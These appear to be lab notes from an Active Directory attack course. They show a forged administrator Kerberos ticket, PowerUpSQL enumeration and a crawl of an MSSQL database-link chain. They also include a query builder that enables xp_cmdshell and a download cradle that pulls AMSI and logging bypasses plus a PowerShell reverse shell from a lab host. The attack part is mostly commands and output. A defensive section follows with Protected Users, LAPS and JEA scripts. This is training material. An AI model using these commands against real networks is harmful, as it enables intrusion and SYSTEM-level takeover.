lWJHl4NwXBAt4JNVV0VIXNvMz6pJkbthkci807hZAUkMMlXjTO6L0E3BjXqlDHIB7aYhaM2mGxTrQrrX
+k21QF8diCo5XoCF8TNPNo+7HNOTnRAxhCw9ouuQfG0JtYW1yPkYsxdEsdwXaKVDAncRs0tCcSnR6CnF
d98MxEmJCyRSeQ736MJpiq0eSzvxFFI0HEjU+vSmmf0YALHolHX/VyQBkCMZDV4FreCkbRLIcofu4EtE
M2vHbepe9ZEPczm5xIDU6x8qLP+h1HT0C4JldP7RQjrUwIuOImEQYY+Bk7c5aON9QcI0j17Gj64nhkiY
GpiJji3glcKp1m9kGwvE/PkYRkGXlEqxANim74KiJ4+Awi/ZBB2Tsy+/JQkSrZs+mlsqJEJ44FYEghLL
ZLePKs3t+ABfblgqQJsSczWDA539pyj9BQYJWz6TFAUGuE5nLhvhfSg4woy91PUimIgR3TEcL0M4FcDd
vZGMAUSUc3D+HT/SCIARBFbk3JIL9HdvUed3OQp+lPNUaSEvEbM132r49ArGqSHL8A9kSq1y2QRnAyNc
Mr9moqJoECPRbu88WmsrHYbHl8R2mB/5HcmknZvK4A3G8df6gQU7anhtgv59N+i5pHrKk/EPKJZlyOXK
wG2GO03af1p7QlYzA0pmdAilzWoQXIiVxq4tyf7PmEwkoeLBMinerZhk/pM32WkufOaegwGwxG4urmXL
H40waPz2mR5KqYo/sIDvy9k/QKLxBd6XBwr6py9N6jsCIrI0e3KS3fWDDgzqrju8mgzwULqgjWGw6tPl
/Vfho4HkMIHhoAMCAQCigdkEgdZ9gdMwgdCggc0wgcowgcegGzAZoAMCARehEgQQ4Fns376qaf0T/hl1
/9Nb4qERGw9NT05FWUNPUlAuTE9DQUyiGjAYoAMCAQGhETAPGw1hZG1pbmlzdHJhdG9yowcDBQBA4QAA
pREYDzIwMjQwNzA1MTAwMjA4WqYRGA8yMDI0MDcwNTIwMDIwOFqnERgPMjAyNDA3MTIxMDAyMDhaqBEb
D01PTkVZQ09SUC5MT0NBTKkkMCKgAwIBAqEbMBkbBmtyYnRndBsPbW9uZXljb3JwLmxvY2Fs
[+] Ticket successfully imported!

ServiceName : krbtgt/moneycorp.local
ServiceRealm : MONEYCORP.LOCAL
UserName : administrator
UserRealm : MONEYCORP.LOCAL
StartTime : 7/5/2024 3:02:08 AM
EndTime : 7/5/2024 1:02:08 PM
RenewTill : 7/12/2024 3:02:08 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : 4Fns376qaf0T/hl1/9Nb4g==
ASREP (key) : BCA608E43E28AC4DDD0839391B6CC66E

C:\Windows\system32>klist

Current LogonId is 0:0x1e09b03

Cached Tickets: (1)

#0> Client: administrator @ MONEYCORP.LOCAL


Server: krbtgt/moneycorp.local @ MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 7/5/2024 3:02:08 (local)
End Time: 7/5/2024 13:02:08 (local)
Renew Time: 7/12/2024 3:02:08 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

C:\Windows\system32>winrs -r:mcorp-dc.moneycorp.local cmd.exe


Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.
C:\Users\Administrator>set username
set username
USERNAME=Administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=MCORP-DC
MS SQL Servers abuse
Enumeration
We use PowerUpSQL to enumerate the MSSQL servers in the domain.

Listing SQL Servers


Get-SQLInstanceDomain -Verbose performs SPN scanning: it queries the domain for service principal names that begin with MSSQL. Because this is only an LDAP lookup, it works with any domain user and never touches the SQL servers themselves.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Import-Module C:\Ad\Tools\PowerUpSQL-master\PowerUpSQL.psd1


WARNING: The names of some imported commands from the module 'PowerUpSQL' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs, type Get-Verb.
PS C:\Windows\system32> Get-SQLInstanceDomain -Verbose
VERBOSE: Grabbing SPNs from the domain for SQL Servers (MSSQL*)...
VERBOSE: Parsing SQL Server instances from SPNs...
VERBOSE: 6 instances were found.

ComputerName : dcorp-mgmt.dollarcorp.moneycorp.local
Instance : dcorp-mgmt.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123394400
DomainAccount : svcadmin
DomainAccountCn : svc admin
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
LastLogon : 7/5/2024 12:41 AM
Description : Account to be used for services which need high privileges.

ComputerName : dcorp-mgmt.dollarcorp.moneycorp.local
Instance : dcorp-mgmt.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123394400
DomainAccount : svcadmin
DomainAccountCn : svc admin
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local
LastLogon : 7/5/2024 12:41 AM
Description : Account to be used for services which need high privileges.

ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : dcorp-mssql.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123385400
DomainAccount : DCORP-MSSQL$
DomainAccountCn : DCORP-MSSQL
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local:1433
LastLogon : 7/5/2024 3:06 AM
Description :

ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : dcorp-mssql.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123385400
DomainAccount : DCORP-MSSQL$
DomainAccountCn : DCORP-MSSQL
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local
LastLogon : 7/5/2024 3:06 AM
Description :

ComputerName : dcorp-sql1.dollarcorp.moneycorp.local
Instance : dcorp-sql1.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123386400
DomainAccount : DCORP-SQL1$
DomainAccountCn : DCORP-SQL1
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local:1433
LastLogon : 7/5/2024 3:06 AM
Description :

ComputerName : dcorp-sql1.dollarcorp.moneycorp.local
Instance : dcorp-sql1.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123386400
DomainAccount : DCORP-SQL1$
DomainAccountCn : DCORP-SQL1
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local
LastLogon : 7/5/2024 3:06 AM
Description :

The six SPN entries correspond to three SQL servers in the domain; each host appears once with the :1433 port in the SPN and once without. Note that dcorp-mgmt runs SQL Server under the domain user svcadmin (described as a high-privilege account), which makes that SPN a Kerberoasting candidate, while the other two instances run under their machine accounts.

• dcorp-mgmt.dollarcorp.moneycorp.local

• dcorp-mssql.dollarcorp.moneycorp.local

• dcorp-sql1.dollarcorp.moneycorp.local

Test Connectivity
PS C:\Windows\system32> Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
VERBOSE: Creating runspace pool and session states
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local,1433 : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: DCORP-STD163 : Connection Failed.
VERBOSE: Closing the runspace pool

ComputerName Instance Status


------------ -------- ------
dcorp-mgmt.dollarcorp.moneycorp.local dcorp-mgmt.dollarcorp.moneycorp.local Not Accessible
dcorp-mgmt.dollarcorp.moneycorp.local dcorp-mgmt.dollarcorp.moneycorp.local,1433 Not Accessible
dcorp-mssql.dollarcorp.moneycorp.local dcorp-mssql.dollarcorp.moneycorp.local,1433 Accessible
dcorp-mssql.dollarcorp.moneycorp.local dcorp-mssql.dollarcorp.moneycorp.local Accessible
dcorp-sql1.dollarcorp.moneycorp.local dcorp-sql1.dollarcorp.moneycorp.local,1433 Not Accessible
dcorp-sql1.dollarcorp.moneycorp.local dcorp-sql1.dollarcorp.moneycorp.local Not Accessible
DCORP-STD163 DCORP-STD163 Not Accessible

Extracting information
PS C:\Windows\system32> Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local,1433 : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local : Connection Failed.

ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : DCORP-MSSQL
DomainName : dcorp
ServiceProcessID : 1880
ServiceName : MSSQLSERVER
ServiceAccount : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Developer Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : dcorp\student163
IsSysadmin : No
ActiveSessions : 1

ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : DCORP-MSSQL
DomainName : dcorp
ServiceProcessID : 1880
ServiceName : MSSQLSERVER
ServiceAccount : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Developer Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : dcorp\student163
IsSysadmin : No
ActiveSessions : 1

The student's domain account can connect to dcorp-mssql with Windows authentication but is not sysadmin there (IsSysadmin : No), and the instances on dcorp-mgmt and dcorp-sql1 refuse the connection entirely. This is why the database links are the way forward.

Abusing MSSQL Servers Database Links


A database link (linked server) allows a SQL Server to access external data sources such as other SQL Servers and OLE DB data sources. For links between SQL Servers it is possible to run queries and stored procedures on the remote instance. The remote side authenticates with the login configured on the link, not with the identity of the caller, so a low-privileged login on the first server inherits whatever privileges the link's login holds on the next one. Database links work even across forest trusts.

Enumeration
PS C:\Windows\system32> Get-SQLServerLink -Instance dcorp-mssql.dollarcorp.moneycorp.local

ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : dcorp-mssql.dollarcorp.moneycorp.local
DatabaseLinkId : 0
DatabaseLinkName : DCORP-MSSQL
DatabaseLinkLocation : Local
Product : SQL Server
Provider : SQLNCLI
Catalog :
LocalLogin :
RemoteLoginName :
is_rpc_out_enabled : True
is_data_access_enabled : False
modify_date : 11/14/2022 4:46:10 AM

ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : dcorp-mssql.dollarcorp.moneycorp.local
DatabaseLinkId : 1
DatabaseLinkName : DCORP-SQL1
DatabaseLinkLocation : Remote
Product : SQL Server
Provider : SQLNCLI
Catalog :
LocalLogin :
RemoteLoginName :
is_rpc_out_enabled : False
is_data_access_enabled : True
modify_date : 12/4/2022 5:16:19 AM

From the output it can be confirmed that there is a database link from dcorp-mssql to DCORP-SQL1. Data access is enabled on that link, so openquery() works across it, but RPC Out is disabled, which means EXECUTE ... AT cannot be used over this first hop.

select * from master..sysservers - This SQL query can also be used to list the database links. Its output likewise shows the link from dcorp-mssql to dcorp-sql1.

If data access is enabled on the link, the openquery() function can be used to run queries on the linked server:

select * from openquery("DCORP-SQL1",'select * from master..sysservers')

The output of this query shows a further link from dcorp-sql1 to dcorp-mgmt.

dcorp-mgmt might have links to other servers as well, and every additional hop requires another level of nested openquery() with the inner single quotes doubled again.

Instead of following the links by hand, the PowerUpSQL function Get-SQLServerLinkCrawl enumerates the whole chain of links.
PS C:\Windows\system32> Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -
Verbose
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DCORP-MSSQL
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL
VERBOSE: - Link Login: dcorp\student163
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: DCORP-SQL1
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DCORP-SQL1
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1
VERBOSE: - Link Login: dblinkuser
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: DCORP-MGMT
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DCORP-MGMT
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT
VERBOSE: - Link Login: sqluser
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: EU-SQL10.EU.EUROCORP.LOCAL
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: EU-SQL10
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT -> EU-
SQL10.EU.EUROCORP.LOCAL
VERBOSE: - Link Login: sa
VERBOSE: - Link IsSysAdmin: 1
VERBOSE: - Link Count: 0
VERBOSE: - Links on this server:

Version : SQL Server 2019


Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student163
Links : {DCORP-SQL1}

Version : SQL Server 2019


Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}

Version : SQL Server 2019


Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL10.EU.EUROCORP.LOCAL}

Version : SQL Server 2019


Instance : EU-SQL10
CustomQuery :
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL10.EU.EUROCORP.LOCAL}
User : sa
Links :

The output shows the chain of links. The login used on each intermediate hop (dblinkuser, sqluser) is not sysadmin, but the final link to EU-SQL10.EU.EUROCORP.LOCAL, an instance in a different forest, is configured with sa, so we have sysadmin on that instance. Since we are sysadmin there, we can use xp_cmdshell on it.
PS C:\Windows\system32> Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -
Query "exec master..xp_cmdshell 'cmd /c set username'"

Version : SQL Server 2019


Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student163
Links : {DCORP-SQL1}

Version : SQL Server 2019


Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}

Version : SQL Server 2019


Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL10.EU.EUROCORP.LOCAL}

Version : SQL Server 2019


Instance : EU-SQL10
CustomQuery : {USERNAME=SYSTEM, }
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL10.EU.EUROCORP.LOCAL}
User : sa
Links :
xp_cmdshell is already enabled on EU-SQL10.EU.EUROCORP.LOCAL; the command ran as SYSTEM, which is the account the SQL Server service uses on that host (for a sysadmin caller, xp_cmdshell runs in the service account's context).

If it is not enabled, it can be turned on through the link chain with EXECUTE ... AT. This requires RPC Out to be enabled on the link to the target (is_rpc_out_enabled), and if sp_configure reports that xp_cmdshell does not exist or is an advanced option, 'show advanced options' must be set to 1 first.

Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "EU-SQL10.EU.EUROCORP.LOCAL"'
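
The following is an added example, not part of the course material or of PowerUpSQL. It serves both the nested openquery() discussion above and the xp_cmdshell enabling command: the function (the name ConvertTo-LinkedQuery is mine) generates the T-SQL for an arbitrary chain of links, either with openquery(), which needs data access on every link, or with EXECUTE ... AT, which needs RPC Out on every link. The link names are the lab's; the generated statement is submitted to the first server with PowerUpSQL's Get-SQLQuery.

```powershell
# Added example, not from the course or from PowerUpSQL.
# Each hop through openquery() or EXECUTE ... AT wraps the inner statement in single
# quotes, so every quote in the innermost query has to be doubled once per hop. Doing
# that by hand is where most multi-hop link attacks go wrong; build the statement instead.
function ConvertTo-LinkedQuery {
    param(
        [string[]] $LinkPath,                        # hops in order; the first link lives on the server you connect to
        [Parameter(Mandatory)] [string] $Query,      # statement to run on the last hop
        [ValidateSet('OpenQuery', 'ExecuteAt')] [string] $Method = 'OpenQuery'
    )
    $stmt = $Query
    # Wrap from the last hop back to the first: the innermost statement ends up quoted most.
    for ($i = $LinkPath.Count - 1; $i -ge 0; $i--) {
        $escaped = $stmt -replace "'", "''"
        if ($Method -eq 'OpenQuery') {
            # Needs is_data_access_enabled on the link; the inner statement must return a rowset.
            $stmt = "select * from openquery(`"$($LinkPath[$i])`", '$escaped')"
        }
        else {
            # Needs is_rpc_out_enabled on the link; can run sp_configure and other procedures.
            $stmt = "EXECUTE('$escaped') AT `"$($LinkPath[$i])`""
        }
    }
    return $stmt
}

# Link path from dcorp-mssql, as found by Get-SQLServerLinkCrawl.
$path = 'DCORP-SQL1', 'DCORP-MGMT', 'EU-SQL10.EU.EUROCORP.LOCAL'

# 1. Read-only check at the end of the chain (works with data access alone):
#    which server are we on and is the link login sysadmin there?
$check = ConvertTo-LinkedQuery -LinkPath $path -Query "select @@servername as srv, is_srvrolemember('sysadmin') as is_sysadmin"

# 2. Enable xp_cmdshell on the last hop. 'show advanced options' must be on first,
#    and EXECUTE ... AT needs RPC Out on every link in the path.
$enable = ConvertTo-LinkedQuery -LinkPath $path -Method ExecuteAt -Query "sp_configure 'show advanced options',1;reconfigure;sp_configure 'xp_cmdshell',1;reconfigure;"

# 3. Run an OS command through the whole chain once xp_cmdshell is on.
$cmd = ConvertTo-LinkedQuery -LinkPath $path -Query "exec master..xp_cmdshell 'whoami'"

$check; $enable; $cmd   # print the generated statements for inspection

# Submit any of them to the first server with PowerUpSQL, for example:
# Get-SQLQuery -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query $check
```

Run the read-only check before anything else: it tells you which hop is the one where the link login is sysadmin, and therefore where xp_cmdshell (and the resulting OS shell) will actually execute. The double-quoted link names require QUOTED_IDENTIFIER ON, which is the default for .NET SQL clients such as PowerUpSQL; use [brackets] instead if a client has it off.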

Getting a reverse shell


Creating a listener
C:\Windows\system32>"C:\AD\Tools\netcat-win32-1.12\nc.exe" -nvlp 443
listening on [any] 443 ...

The scripts (the script-block logging bypass, the AMSI bypass and the modified Invoke-PowerShellTcp) are hosted on a web server on the student machine, 172.16.100.163, so that EU-SQL10 can download them. Since only the last hop runs as sa, -QueryTarget eu-sql10 restricts the custom query to that instance.

PS C:\Windows\system32> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec


master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing
http://172.16.100.163/sbloggingbypass.txt);iex (iwr -UseBasicParsing
http://172.16.100.163/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.163/Invoke-
PowerShellTcp_modified.ps1)"''' -QueryTarget eu-sql10

Version : SQL Server 2019


Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student163
Links : {DCORP-SQL1}

Version : SQL Server 2019

Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}

Version : SQL Server 2019


Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL10.EU.EUROCORP.LOCAL}

Version : SQL Server 2019


Instance : EU-SQL10
CustomQuery :
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL10.EU.EUROCORP.LOCAL}
User : sa
Links :

We receive a reverse shell as SYSTEM on EU-SQL10:


connect to [172.16.100.163] from (UNKNOWN) [172.16.15.17] 55263
Windows PowerShell running as user SYSTEM on EU-SQL10
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>set username
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> hostname
eu-sql10
PS C:\Windows\system32>
Detection and Defense
Protect and Limit Domain Admins
• Reduce the number of Domain Administrators in your environment.

• Do not allow, or strictly limit, Domain Administrators logging on to any machine other than the domain controllers. If logons to some servers are necessary, do not allow other administrators to log on to those machines.

• Never run a service under an account with Domain Administrator privileges. Credentials for service accounts are stored on the host as LSA Secrets under HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets, and anyone with local administrative privileges can extract them in clear text. Credential Guard does not protect these secrets, since they are stored on disk rather than held in LSASS memory, and extraction with built-in tools (for example saving the SECURITY and SYSTEM hives) is easy to miss without specific detection.

• Set "Account is sensitive and cannot be delegated" on Domain Administrator accounts.

Protected Users Group


Protected Users is a global security group for Active Directory (AD) designed to protect against credential
theft attacks. The group triggers non-configurable protection on devices and host computers to prevent
credentials from being cached when group members sign-in.

Prerequisites
Your system must meet the following prerequisites before you can deploy a Protected Users group:

• Hosts must be running one of the following operating systems:

o Windows 8.1 or later

o Windows Server 2012 R2 or later with the most recent security updates installed

• The domain functional level must be Windows Server 2012 R2 or later.

Protections applied by Active Directory


Becoming a member of the Protected Users group means AD automatically applies certain pre-configured
controls that the users won't be able to change unless they stop being group members.

Device protections for signed in Protected Users


When the signed in user is a member of the Protected Users group, the group provides the following
protections:

• Credential delegation (CredSSP) doesn't cache the user's plain text credentials even when the user
enables the Allow delegating default credentials Group Policy setting.

• For Windows 8.1 and later and Windows Server 2012 R2 and later, Windows Digest doesn't cache
the user's plaintext credentials even when they've enabled Windows Digest.

• NTLM stops caching the user's plaintext credentials or NT one-way function (NTOWF).
• Kerberos stops creating Data Encryption Standard (DES) or RC4 keys. Kerberos also doesn't cache
the user's plaintext credentials or long-term keys after acquiring the initial Ticket Granting Ticket
(TGT).

• The system doesn't create a cached verifier at user sign-in or unlock, so member systems no
longer support offline sign-in.

After you add a new user account to the Protected Users group, these protections will activate when the
new Protected User signs in to their device.

Domain controller protections for Protected Users


Protected User accounts that authenticate to a domain running Windows Server 2012 R2 or later are
unable to do the following:

• Authenticate with NTLM authentication.

• Use DES or RC4 encryption types in Kerberos pre-authentication.

• Delegate with unconstrained or constrained delegation.

• Renew Kerberos TGTs beyond their initial four-hour lifetime.
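
The following is an added example, not from the course, that audits what the two sections above ask for (limiting Domain Admins and putting them in Protected Users). For every user in Domain Admins it reports whether the account is in Protected Users, whether "Account is sensitive and cannot be delegated" is set, and whether the account carries an SPN, i.e. is being used as a service account. It assumes the RSAT ActiveDirectory module and read access to the domain; the group and attribute names are the standard ones, the function name is mine.

```powershell
# Added example, not part of the course material.
# Requires the RSAT ActiveDirectory module; read-only against the domain.
Import-Module ActiveDirectory

function Get-DomainAdminHardeningReport {
    param(
        [string] $AdminGroup     = 'Domain Admins',
        [string] $ProtectedGroup = 'Protected Users'
    )
    # Resolve Protected Users membership once; -Recursive also catches nested groups.
    $protected = @{}
    Get-ADGroupMember -Identity $ProtectedGroup -Recursive |
        ForEach-Object { $protected[$_.distinguishedName] = $true }

    Get-ADGroupMember -Identity $AdminGroup -Recursive |
        Where-Object { $_.objectClass -eq 'user' } |
        ForEach-Object {
            $u = Get-ADUser -Identity $_.distinguishedName -Properties AccountNotDelegated, ServicePrincipalName, LastLogonDate
            [pscustomobject]@{
                SamAccountName   = $u.SamAccountName
                InProtectedUsers = [bool]$protected[$u.DistinguishedName]
                NotDelegated     = [bool]$u.AccountNotDelegated          # "sensitive and cannot be delegated"
                HasSPN           = ($u.ServicePrincipalName.Count -gt 0)  # a DA with an SPN is a Kerberoastable service account
                LastLogonDate    = $u.LastLogonDate                        # stale admins are candidates for removal
            }
        }
}

# Accounts that fail the checks sort to the top.
Get-DomainAdminHardeningReport |
    Sort-Object InProtectedUsers, NotDelegated |
    Format-Table -AutoSize
```

Before moving an account into Protected Users, confirm it does not rely on NTLM, on RC4-only services, or on logons from hosts older than Windows 8.1 / Server 2012 R2, and never add service or computer accounts: the four-hour TGT and the loss of NTLM will break them.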

Isolate Administrative workstations


Privileged Access Workstations (PAW)
• A hardened workstation for performing sensitive tasks such as administration of domain controllers, cloud infrastructure and sensitive business functions.

• Provides protection from phishing attacks, OS vulnerabilities and credential replay attacks, because privileged credentials are only ever typed into the hardened host.

• Admin jump servers should be accessible only from a PAW. Several deployment strategies exist:

o Separate privilege and hardware for administrative and normal tasks

o Having a VM on the PAW for user tasks

Secure Local Administrators


Use LAPS

• Centralized storage of local administrator passwords in AD, randomized periodically, with read permission controlled by an ACL on the attribute

• Computer objects gain two attributes: ms-Mcs-AdmPwd, which stores the clear-text password, and ms-Mcs-AdmPwdExpirationTime, which controls when the password is changed

• The password is stored in clear text in AD (transmission is encrypted), so audit which principals hold the extended right to read ms-Mcs-AdmPwd: that right is exactly what an attacker enumerates, and it turns any compromised member of such a group into local admin on every computer in scope.


Time Bound Administration
Just in Time (JIT) administration
Just in Time (JIT) administration grants time-bound administrative access on a per-request basis, so that an account holds its privileges only for the duration of an approved task.

Just Enough Administration (JEA)

• Provides role-based access control for PowerShell-based remote delegated administration

• With JEA, non-admin users can connect remotely to machines to perform specific administrative tasks, typically running as a temporary virtual account on the target rather than with their own credentials

• For example, we can control the commands a user runs and even restrict the parameters and parameter values which can be used

• JEA endpoints have PowerShell transcription and logging enabled
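
The following is an added example, not from the course, showing what the bullets above look like as an actual JEA endpoint: a help-desk role that may restart only two named services, running as a virtual account, with every session transcribed. The group name DCORP\HelpDesk, the module name HelpDeskJEA and the endpoint name HelpDesk are assumptions; the cmdlets and their parameters are the standard JEA ones. Run it on the target server as an administrator.

```powershell
# Added example, not part of the course material. Assumed names: HelpDeskJEA, HelpDeskOps,
# HelpDesk and the DCORP\HelpDesk group. Requires PowerShell 5.0+ and local admin on the host.
$moduleName = 'HelpDeskJEA'
$modulePath = Join-Path $env:ProgramFiles "WindowsPowerShell\Modules\$moduleName"
$rcPath     = Join-Path $modulePath 'RoleCapabilities'
New-Item -ItemType Directory -Path $rcPath -Force | Out-Null
# Role capability files are only discovered inside a valid module, hence the manifest.
New-ModuleManifest -Path (Join-Path $modulePath "$moduleName.psd1")

# Role capability: which commands the role may run, and which parameter values it may pass.
New-PSRoleCapabilityFile -Path (Join-Path $rcPath 'HelpDeskOps.psrc') -VisibleCmdlets @(
    @{ Name = 'Restart-Service'; Parameters = @{ Name = 'Name'; ValidateSet = 'Spooler', 'W32Time' } },
    @{ Name = 'Get-Service' }
)

# Session configuration: a restricted endpoint, a temporary virtual account (local admin on
# this host only, so no domain credential is ever sent or cached here) and a transcript
# directory that records every command of every session.
$sessionFile = Join-Path $env:TEMP 'HelpDesk.pssc'
New-PSSessionConfigurationFile -Path $sessionFile `
    -SessionType RestrictedRemoteServer `
    -RunAsVirtualAccount `
    -TranscriptDirectory 'C:\JEATranscripts' `
    -RoleDefinitions @{ 'DCORP\HelpDesk' = @{ RoleCapabilities = 'HelpDeskOps' } }

# Validate the file, then register the endpoint (-Force suppresses the WinRM restart prompt).
if (Test-PSSessionConfigurationFile -Path $sessionFile) {
    Register-PSSessionConfiguration -Name 'HelpDesk' -Path $sessionFile -Force
}

# A help-desk user then connects to this endpoint instead of a full PowerShell session:
#   Enter-PSSession -ComputerName dcorp-mgmt -ConfigurationName HelpDesk
# Inside it, Restart-Service -Name Spooler works, while Restart-Service -Name LanmanServer
# and any cmdlet not listed above are rejected by the endpoint.
```

The point for defenders is the combination: the user never holds local admin or exposes a privileged credential on the host, the command surface is a whitelist, and the transcript directory gives the SOC a complete record of what was run.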

Tier Model
